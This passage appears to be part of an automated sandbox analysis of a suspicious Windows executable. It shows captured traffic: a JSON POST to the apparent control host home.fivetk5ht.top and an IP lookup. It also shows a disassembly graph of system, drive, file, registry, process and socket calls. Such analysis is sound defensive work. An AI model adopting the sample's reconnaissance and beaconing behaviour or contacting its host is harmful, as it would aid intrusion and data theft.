
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.749709185.121.15.192805140C:\Users\user\Desktop\t6VDbnvGeN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 20, 2024 16:32:29.962542057 CET284OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                            Host: home.fivetk5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 20, 2024 16:32:31.252634048 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.74970198.85.100.804435140C:\Users\user\Desktop\t6VDbnvGeN.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-20 15:32:24 UTC52OUTGET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-20 15:32:24 UTC224INHTTP/1.1 200 OK
                                                            Date: Fri, 20 Dec 2024 15:32:24 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-20 15:32:24 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            System Behavior

                                                            General

                                                            Target ID:1
                                                            Start time:10:32:18
                                                            Start date:20/12/2024
                                                            Path:C:\Users\user\Desktop\t6VDbnvGeN.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\t6VDbnvGeN.exe"
                                                            Imagebase:0x7c0000
                                                            File size:4'454'912 bytes
                                                            MD5 hash:9E3EEBDF7F1998324106447A4EB441C8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:2.8%
                                                              Dynamic/Decrypted Code Coverage:37.2%
                                                              Signature Coverage:9.4%
                                                              Total number of Nodes:406
                                                              Total number of Limit Nodes:44
                                                              execution_graph 92174 7c255d 92219 b49f70 92174->92219 92176 7c256c GetSystemInfo 92177 7c2589 92176->92177 92178 7c25a0 GlobalMemoryStatusEx 92177->92178 92179 7c25ec 92178->92179 92221 75600e8 92179->92221 92227 756016d 92179->92227 92233 7560028 92179->92233 92239 75601a7 92179->92239 92245 7560225 92179->92245 92251 7560031 92179->92251 92257 75602be 92179->92257 92263 7560077 92179->92263 92269 7560373 92179->92269 92273 756034a 92179->92273 92277 75601f7 92179->92277 92283 75600cf 92179->92283 92289 756008f 92179->92289 92295 756000e 92179->92295 92301 756020f 92179->92301 92307 7560340 92179->92307 92311 7560000 92179->92311 92317 7560182 92179->92317 92323 7560103 92179->92323 92329 7560247 92179->92329 92335 7560045 92179->92335 92341 756001a 92179->92341 92347 7560286 92179->92347 92353 756031e 92179->92353 92359 756025d 92179->92359 92365 7560292 92179->92365 92371 75601d2 92179->92371 92377 7560115 92179->92377 92383 7560055 92179->92383 92389 7560155 92179->92389 92220 b49f7d 92219->92220 92220->92176 92220->92220 92222 75600b9 92221->92222 92223 7560340 GetLogicalDrives 92222->92223 92224 7560340 GetLogicalDrives 92222->92224 92223->92222 92226 75603a2 92224->92226 92228 756018b 92227->92228 92229 7560340 GetLogicalDrives 92228->92229 92230 7560340 GetLogicalDrives 92228->92230 92229->92228 92232 75603a2 92230->92232 92234 7560035 92233->92234 92235 7560340 GetLogicalDrives 92234->92235 92236 7560340 GetLogicalDrives 92234->92236 92235->92234 92238 75603a2 92236->92238 92240 75601c1 92239->92240 92241 7560340 GetLogicalDrives 92240->92241 92242 7560340 GetLogicalDrives 92240->92242 92241->92240 92244 75603a2 92242->92244 92246 75601e6 92245->92246 92247 7560340 GetLogicalDrives 92246->92247 92248 7560340 GetLogicalDrives 92246->92248 92247->92246 92250 75603a2 92248->92250 92252 756003e 92251->92252 92253 7560340 GetLogicalDrives 92252->92253 92254 7560340 GetLogicalDrives 92252->92254 92253->92252 92256 75603a2 92254->92256 92259 756029d 92257->92259 92258 7560340 GetLogicalDrives 92258->92259 92259->92258 92260 7560340 GetLogicalDrives 92259->92260 92262 75603a2 92260->92262 92264 7560099 92263->92264 92265 7560340 GetLogicalDrives 92264->92265 92266 7560340 GetLogicalDrives 92264->92266 92265->92264 92268 75603a2 92266->92268 92270 7560370 92269->92270 92270->92269 92271 7560395 GetLogicalDrives 92270->92271 92272 75603a2 92271->92272 92274 756035b GetLogicalDrives 92273->92274 92276 75603a2 92274->92276 92278 756019a 92277->92278 92279 7560340 GetLogicalDrives 92278->92279 92280 7560340 GetLogicalDrives 92278->92280 92279->92278 92282 75603a2 92280->92282 92285 756006d 92283->92285 92284 7560340 GetLogicalDrives 92284->92285 92285->92284 92286 7560340 GetLogicalDrives 92285->92286 92288 75603a2 92286->92288 92290 7560099 92289->92290 92291 7560340 GetLogicalDrives 92290->92291 92292 7560340 GetLogicalDrives 92290->92292 92291->92290 92294 75603a2 92292->92294 92296 7560010 92295->92296 92297 7560340 GetLogicalDrives 92296->92297 92298 7560340 GetLogicalDrives 92296->92298 92297->92296 92300 75603a2 92298->92300 92302 756022b 92301->92302 92303 7560340 GetLogicalDrives 92302->92303 92304 7560340 GetLogicalDrives 92302->92304 92303->92302 92306 75603a2 92304->92306 92308 756035b GetLogicalDrives 92307->92308 92310 75603a2 92308->92310 92313 7560010 92311->92313 92312 7560340 GetLogicalDrives 92312->92313 92313->92312 92314 7560340 GetLogicalDrives 92313->92314 92316 75603a2 92314->92316 92319 756019a 92317->92319 92318 7560340 GetLogicalDrives 92318->92319 92319->92318 92320 7560340 GetLogicalDrives 92319->92320 92322 75603a2 92320->92322 92324 7560124 92323->92324 92325 7560340 GetLogicalDrives 92324->92325 92326 7560340 GetLogicalDrives 92324->92326 92325->92324 92328 75603a2 92326->92328 92330 7560268 92329->92330 92331 7560340 GetLogicalDrives 92330->92331 92332 7560340 GetLogicalDrives 92330->92332 92331->92330 92334 75603a2 92332->92334 92336 756004b 92335->92336 92337 7560340 GetLogicalDrives 92336->92337 92338 7560340 GetLogicalDrives 92336->92338 92337->92336 92340 75603a2 92338->92340 92342 756003a 92341->92342 92343 7560340 GetLogicalDrives 92342->92343 92344 7560340 GetLogicalDrives 92342->92344 92343->92342 92346 75603a2 92344->92346 92348 7560296 92347->92348 92349 7560340 GetLogicalDrives 92348->92349 92350 7560340 GetLogicalDrives 92348->92350 92349->92348 92352 75603a2 92350->92352 92355 756029d 92353->92355 92354 7560340 GetLogicalDrives 92354->92355 92355->92354 92356 7560340 GetLogicalDrives 92355->92356 92358 75603a2 92356->92358 92360 7560295 92359->92360 92361 7560340 GetLogicalDrives 92360->92361 92362 7560340 GetLogicalDrives 92360->92362 92361->92360 92364 75603a2 92362->92364 92366 756029d 92365->92366 92367 7560340 GetLogicalDrives 92366->92367 92368 7560340 GetLogicalDrives 92366->92368 92367->92366 92370 75603a2 92368->92370 92372 75601e6 92371->92372 92373 7560340 GetLogicalDrives 92372->92373 92374 7560340 GetLogicalDrives 92372->92374 92373->92372 92376 75603a2 92374->92376 92378 7560131 92377->92378 92379 7560340 GetLogicalDrives 92378->92379 92380 7560340 GetLogicalDrives 92378->92380 92379->92378 92382 75603a2 92380->92382 92384 7560064 92383->92384 92385 7560340 GetLogicalDrives 92384->92385 92386 7560340 GetLogicalDrives 92384->92386 92385->92384 92388 75603a2 92386->92388 92391 756017a 92389->92391 92390 7560340 GetLogicalDrives 92390->92391 92391->92390 92392 7560340 GetLogicalDrives 92391->92392 92394 75603a2 92392->92394 92395 7c3d5e 92400 7c3d30 92395->92400 92396 7c3d90 92404 7cfcb0 6 API calls 92396->92404 92399 7c3dc1 92400->92395 92400->92396 92401 7d0ab0 92400->92401 92405 7d05b0 92401->92405 92403 7d0acd 92403->92400 92404->92399 92406 7d07c7 92405->92406 92407 7d05bd 92405->92407 92406->92403 92407->92406 92408 7d0707 WSAEventSelect 92407->92408 92409 7d07ef 92407->92409 92415 7c76a0 92407->92415 92408->92406 92408->92407 92409->92406 92410 7d6fa0 select 92409->92410 92413 7d0847 92409->92413 92410->92413 92412 7d09e8 WSAEnumNetworkEvents 92412->92413 92414 7d09d0 WSAEventSelect 92412->92414 92413->92406 92413->92412 92413->92414 92414->92412 92414->92413 92416 7c76e6 send 92415->92416 92417 7c76c0 92415->92417 92418 7c76c9 92416->92418 92417->92416 92417->92418 92418->92407 92044 7c29ff FindFirstFileA 92045 7c2a31 92044->92045 92046 7c2a5c RegOpenKeyExA 92045->92046 92047 7c2a93 92046->92047 92048 7c2ade CharUpperA 92047->92048 92050 7c2b0a 92048->92050 92049 7c2bf9 QueryFullProcessImageNameA 92051 7c2c3b CloseHandle 92049->92051 92050->92049 92053 7c2c64 92051->92053 92052 7c2df1 CloseHandle 92054 7c2e23 92052->92054 92053->92052 92055 7d1139 92056 7d1148 92055->92056 92058 7d1527 92056->92058 92061 7d0f69 92056->92061 92063 7cfec0 6 API calls 92056->92063 92058->92061 92064 7d22d0 6 API calls 92058->92064 92060 7d0f00 92061->92060 92065 7fd4d0 socket ioctlsocket connect getsockname closesocket 92061->92065 92063->92058 92064->92061 92065->92060 92066 75a04dc 92067 75a04e7 Process32FirstW 92066->92067 92069 75a0520 92067->92069 92070 873c00 92071 873c23 92070->92071 92072 873c0d 92070->92072 92071->92072 92074 88b180 92071->92074 92077 88b19b 92074->92077 92078 88b2e3 92074->92078 92077->92078 92079 88b2a9 getsockname 92077->92079 92081 88b020 closesocket 92077->92081 92082 88af30 92077->92082 92086 88b060 92077->92086 92078->92072 92091 88b020 92079->92091 92081->92077 92083 88af4c 92082->92083 92084 88af63 socket 92082->92084 92083->92084 92085 88af52 92083->92085 92084->92077 92085->92077 92089 88b080 92086->92089 92087 88b0b0 connect 92088 88b0bf WSAGetLastError 92087->92088 92088->92089 92090 88b0ea 92088->92090 92089->92087 92089->92088 92089->92090 92090->92077 92092 88b029 92091->92092 92093 88b052 92091->92093 92094 88b04b closesocket 92092->92094 92095 88b03e 92092->92095 92093->92077 92094->92093 92095->92077 92419 874720 92420 874728 92419->92420 92421 874733 92420->92421 92422 87477d 92420->92422 92431 87476c 92420->92431 92432 875540 socket ioctlsocket connect getsockname closesocket 92420->92432 92424 874774 92426 87482e 92426->92431 92433 879270 92426->92433 92428 874860 92438 874950 92428->92438 92430 874878 92431->92430 92444 8730a0 socket ioctlsocket connect getsockname closesocket 92431->92444 92432->92426 92445 87a440 92433->92445 92435 879297 92437 8792ab 92435->92437 92473 87bbe0 socket ioctlsocket connect getsockname closesocket 92435->92473 92437->92428 92439 874966 92438->92439 92441 8749c5 92439->92441 92443 8749b9 92439->92443 92474 87bbe0 socket ioctlsocket connect getsockname closesocket 92439->92474 92440 874aa0 gethostname 92440->92441 92440->92443 92441->92431 92443->92440 92443->92441 92444->92424 92471 87a46b 92445->92471 92446 87aa03 RegOpenKeyExA 92447 87aa27 RegQueryValueExA 92446->92447 92448 87ab70 RegOpenKeyExA 92446->92448 92449 87aa71 92447->92449 92450 87aacc RegQueryValueExA 92447->92450 92451 87ac34 RegOpenKeyExA 92448->92451 92468 87ab90 92448->92468 92449->92450 92457 87aa85 RegQueryValueExA 92449->92457 92453 87ab66 RegCloseKey 92450->92453 92454 87ab0e 92450->92454 92452 87acf8 RegOpenKeyExA 92451->92452 92470 87ac54 92451->92470 92455 87ad56 RegEnumKeyExA 92452->92455 92459 87ad14 92452->92459 92453->92448 92454->92453 92458 87ab1e RegQueryValueExA 92454->92458 92456 87ad9b 92455->92456 92455->92459 92460 87ae16 RegOpenKeyExA 92456->92460 92461 87aab3 92457->92461 92465 87ab4c 92458->92465 92459->92435 92462 87ae34 RegQueryValueExA 92460->92462 92463 87addf RegEnumKeyExA 92460->92463 92461->92450 92464 87af43 RegQueryValueExA 92462->92464 92472 87adaa 92462->92472 92463->92459 92463->92460 92466 87b052 RegQueryValueExA 92464->92466 92464->92472 92465->92453 92467 87adc7 RegCloseKey 92466->92467 92466->92472 92467->92463 92468->92451 92469 87afa0 RegQueryValueExA 92469->92472 92470->92452 92471->92446 92471->92459 92472->92464 92472->92466 92472->92467 92472->92469 92473->92437 92474->92443 92096 88a080 92099 889740 92096->92099 92098 88a09b 92100 889780 92099->92100 92104 88975d 92099->92104 92101 889925 RegOpenKeyExA 92100->92101 92100->92104 92102 88995a RegQueryValueExA 92101->92102 92101->92104 92103 889986 RegCloseKey 92102->92103 92103->92104 92104->92098 92475 7c2f17 92482 7c2f2c 92475->92482 92476 7c31d3 92477 7c2fb3 RegOpenKeyExA 92477->92482 92478 7c315c RegEnumKeyExA 92478->92482 92479 7c3046 RegOpenKeyExA 92480 7c3089 RegQueryValueExA 92479->92480 92479->92482 92481 7c313b RegCloseKey 92480->92481 92480->92482 92481->92482 92482->92476 92482->92477 92482->92478 92482->92479 92482->92481 92483 7c31d7 92486 7c31f4 92483->92486 92484 7c3200 92485 7c32dc CloseHandle 92485->92484 92486->92484 92486->92485 92105 7f95b0 92106 7f95fd 92105->92106 92107 7f95c8 92105->92107 92107->92106 92109 7fa150 92107->92109 92110 7fa15f 92109->92110 92112 7fa1d0 92109->92112 92111 7fa181 getsockname 92110->92111 92110->92112 92111->92112 92112->92106 92113 7f6ab0 92114 7f6ad5 92113->92114 92115 7f6bb4 92114->92115 92122 7d6fa0 92114->92122 92116 875ed0 7 API calls 92115->92116 92119 7f6ba9 92116->92119 92118 7f6b54 92118->92115 92118->92119 92120 7f6b5d 92118->92120 92120->92119 92126 875ed0 92120->92126 92124 7d6fd4 92122->92124 92125 7d6feb 92122->92125 92123 7d7207 select 92123->92125 92124->92123 92124->92125 92125->92118 92129 875a50 92126->92129 92128 875ee5 92128->92120 92130 875a58 92129->92130 92134 875ea0 92129->92134 92131 875b50 92130->92131 92141 875a99 92130->92141 92142 875b88 92130->92142 92135 875eb4 92131->92135 92136 875b7a 92131->92136 92131->92142 92132 875e96 92162 889480 socket ioctlsocket connect getsockname closesocket 92132->92162 92134->92128 92163 876f10 socket ioctlsocket connect getsockname closesocket 92135->92163 92152 8770a0 92136->92152 92140 875ec2 92140->92140 92141->92142 92144 8770a0 6 API calls 92141->92144 92159 876f10 socket ioctlsocket connect getsockname closesocket 92141->92159 92146 875cae 92142->92146 92160 875ef0 socket ioctlsocket connect getsockname 92142->92160 92144->92141 92146->92132 92148 88a920 92146->92148 92161 889320 socket ioctlsocket connect getsockname closesocket 92146->92161 92149 88a944 92148->92149 92150 88a94b 92149->92150 92151 88a977 send 92149->92151 92150->92146 92151->92146 92156 8770ae 92152->92156 92154 8771a7 92154->92142 92155 87717f 92155->92154 92169 889320 socket ioctlsocket connect getsockname closesocket 92155->92169 92156->92154 92156->92155 92164 88a8c0 92156->92164 92168 8771c0 socket ioctlsocket connect getsockname 92156->92168 92159->92141 92160->92142 92161->92146 92162->92134 92163->92140 92165 88a903 recvfrom 92164->92165 92166 88a8e6 92164->92166 92167 88a8ed 92165->92167 92166->92165 92166->92167 92167->92156 92168->92156 92169->92154 92487 7f8b50 92488 7f8b6b 92487->92488 92506 7f8bb5 92487->92506 92489 7f8b8f 92488->92489 92490 7f8bf3 92488->92490 92488->92506 92522 7d6e40 select 92489->92522 92507 7fa550 92490->92507 92493 7f8ba1 92495 7f8cd9 SleepEx getsockopt 92493->92495 92496 7f8cb2 92493->92496 92493->92506 92494 7f8bfc 92494->92496 92498 7f8c1f connect 92494->92498 92501 7f8c35 92494->92501 92494->92506 92499 7f8d18 92495->92499 92497 7fa150 getsockname 92496->92497 92505 7f8dff 92496->92505 92496->92506 92497->92505 92498->92501 92499->92496 92500 7f8d43 92499->92500 92504 7fa150 getsockname 92500->92504 92503 7fa150 getsockname 92501->92503 92503->92493 92504->92506 92505->92506 92523 7c78b0 closesocket 92505->92523 92508 7fa575 92507->92508 92512 7fa597 92508->92512 92525 7c75e0 92508->92525 92510 7c78b0 closesocket 92511 7fa713 92510->92511 92511->92494 92513 7fa811 setsockopt 92512->92513 92518 7fa83b 92512->92518 92520 7fa69b 92512->92520 92513->92518 92515 7faf56 92516 7faf5d 92515->92516 92515->92520 92516->92511 92517 7fa150 getsockname 92516->92517 92517->92511 92518->92520 92521 7fabe1 92518->92521 92531 7f6be0 8 API calls 92518->92531 92520->92510 92520->92511 92521->92520 92530 8267e0 ioctlsocket 92521->92530 92522->92493 92524 7c78c5 92523->92524 92524->92506 92526 7c75ef 92525->92526 92527 7c7607 socket 92525->92527 92526->92527 92529 7c7643 92526->92529 92528 7c762b 92527->92528 92528->92512 92529->92512 92530->92515 92531->92521 92532 75b0368 92533 75b037f Process32NextW 92532->92533 92535 75b03ab 92533->92535 92170 b4b160 Sleep 92171 7dd5e0 92172 7dd652 WSAStartup 92171->92172 92173 7dd5f0 92171->92173 92172->92173 92536 7fb400 92537 7fb40b 92536->92537 92538 7fb425 92536->92538 92541 7c7770 92537->92541 92539 7fb421 92542 7c77b6 recv 92541->92542 92543 7c7790 92541->92543 92544 7c7799 92542->92544 92543->92542 92543->92544 92544->92539 92545 7fe400 92546 7fe412 92545->92546 92548 7fe459 92545->92548 92549 7f68b0 socket ioctlsocket connect getsockname closesocket 92546->92549 92549->92548 92550 7fb3c0 92551 7fb3ee 92550->92551 92552 7fb3cb 92550->92552 92554 7c76a0 send 92552->92554 92556 7f9290 92552->92556 92553 7fb3ea 92554->92553 92557 7c76a0 send 92556->92557 92558 7f92e5 92557->92558 92559 7f9335 WSAIoctl 92558->92559 92562 7f9392 92558->92562 92560 7f9366 92559->92560 92559->92562 92561 7f9371 setsockopt 92560->92561 92560->92562 92561->92562 92562->92553

                                                              Executed Functions

                                                              Function 007FF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: 9f3b585c7eeb77f24466be9716a651bec66db287a3d89771aed60ae47900b65c
                                                              • Instruction ID: 02e7726865e38025d8ef5f531683e382ce2dbadecaa790c35676edef2f896dc8
                                                              • Opcode Fuzzy Hash: 9f3b585c7eeb77f24466be9716a651bec66db287a3d89771aed60ae47900b65c
                                                              • Instruction Fuzzy Hash: 57C2AE31A047489FD724CF28C484B6AB7E1FF84314F04866DED999B3A2DB75E984CB91
                                                              Function 007C255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1190 7c255d-7c2614 call b49f70 GetSystemInfo call c40ff0 call c411e0 GlobalMemoryStatusEx call c40ff0 call c411e0 1272 7c2619 call 7560155 1190->1272 1273 7c2619 call 7560115 1190->1273 1274 7c2619 call 7560055 1190->1274 1275 7c2619 call 7560292 1190->1275 1276 7c2619 call 75601d2 1190->1276 1277 7c2619 call 756031e 1190->1277 1278 7c2619 call 756025d 1190->1278 1279 7c2619 call 756001a 1190->1279 1280 7c2619 call 7560286 1190->1280 1281 7c2619 call 7560247 1190->1281 1282 7c2619 call 7560045 1190->1282 1283 7c2619 call 7560182 1190->1283 1284 7c2619 call 7560103 1190->1284 1285 7c2619 call 7560340 1190->1285 1286 7c2619 call 7560000 1190->1286 1287 7c2619 call 756000e 1190->1287 1288 7c2619 call 756020f 1190->1288 1289 7c2619 call 75600cf 1190->1289 1290 7c2619 call 756008f 1190->1290 1291 7c2619 call 756034a 1190->1291 1292 7c2619 call 75601f7 1190->1292 1293 7c2619 call 7560077 1190->1293 1294 7c2619 call 7560373 1190->1294 1295 7c2619 call 7560031 1190->1295 1296 7c2619 call 75602be 1190->1296 1297 7c2619 call 75601a7 1190->1297 1298 7c2619 call 7560225 1190->1298 1299 7c2619 call 756016d 1190->1299 1300 7c2619 call 7560028 1190->1300 1301 7c2619 call 75600e8 1190->1301 1201 7c261b-7c2620 1202 7c277c-7c2904 call c40ff0 call c411e0 KiUserCallbackDispatcher call c40ff0 call c411e0 call c40ff0 call c411e0 call b48e38 call b48be0 call b48bd0 FindFirstFileW 1201->1202 1203 7c2626-7c2637 call c40df0 1201->1203 1250 7c2928-7c292c 1202->1250 1251 7c2906-7c2926 FindNextFileW 1202->1251 1208 7c2754-7c275c 1203->1208 1210 7c263c-7c264f GetDriveTypeA 1208->1210 1211 7c2762-7c2777 call c411e0 1208->1211 1213 7c2655-7c2685 GetDiskFreeSpaceExA 1210->1213 1214 7c2743-7c2751 call b48b98 1210->1214 1211->1202 1213->1214 1217 7c268b-7c273e call c410c0 call c41150 call c411e0 call c40ee0 call c411e0 call c40ee0 call c411e0 call c3f560 1213->1217 1214->1208 1217->1214 1252 7c292e 1250->1252 1253 7c2932-7c296f call c40ff0 call c411e0 call b48e78 1250->1253 1251->1250 1251->1251 1252->1253 1259 7c2974-7c2979 1253->1259 1260 7c29a9-7c29fe call b4a290 call c40ff0 call c411e0 1259->1260 1261 7c297b-7c29a4 call c40ff0 call c411e0 1259->1261 1261->1260 1272->1201 1273->1201 1274->1201 1275->1201 1276->1201 1277->1201 1278->1201 1279->1201 1280->1201 1281->1201 1282->1201 1283->1201 1284->1201 1285->1201 1286->1201 1287->1201 1288->1201 1289->1201 1290->1201 1291->1201 1292->1201 1293->1201 1294->1201 1295->1201 1296->1201 1297->1201 1298->1201 1299->1201 1300->1201 1301->1201
                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 007C2579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 007C25CC
                                                              • GetDriveTypeA.KERNELBASE ref: 007C2647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 007C267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 007C27E2
                                                              • FindFirstFileW.KERNELBASE ref: 007C28F8
                                                              • FindNextFileW.KERNELBASE ref: 007C291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: ;%|$@$`
                                                              • API String ID: 3271271169-268358005
                                                              • Opcode ID: b0c9f61b96b4fe71df57e27bcc2e845c360e83fd918fed3877330265556fc865
                                                              • Instruction ID: 091f2974318bfa4f07832f7aeb98205891caa49be03c2ab6c8163301c68d7fd8
                                                              • Opcode Fuzzy Hash: b0c9f61b96b4fe71df57e27bcc2e845c360e83fd918fed3877330265556fc865
                                                              • Instruction Fuzzy Hash: 08D1C1B49053099FCB10EFA8C99569EBBF0BF48344F10886DE998D7351E7349A84DF92
                                                              Function 007C29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
